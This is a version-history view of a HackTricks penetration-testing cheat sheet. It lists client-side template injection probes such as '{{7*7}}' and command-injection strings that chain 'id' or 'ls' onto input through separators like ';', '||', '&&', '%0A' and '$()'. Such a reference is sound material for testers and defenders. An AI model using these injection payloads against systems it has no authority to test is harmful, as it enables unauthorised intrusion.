hacktricks/pentesting-web/pocs-and-polygloths-cheatsheet.md

26 lines
196 B
Markdown
Raw Normal View History

2021-06-25 16:39:43 +00:00
# PoCs and Polygloths CheatSheet
### Client Side Template Injection
```text
{{7*7}}
2021-06-25 16:50:01 +00:00
[7*7]
2021-06-25 16:39:43 +00:00
```
2021-06-25 16:50:01 +00:00
### Command Injection
```text
ls; id
ls||id;
ls|id;
ls&&id;
ls&id;
ls%0Aid
`ls`
$(ls)
```
###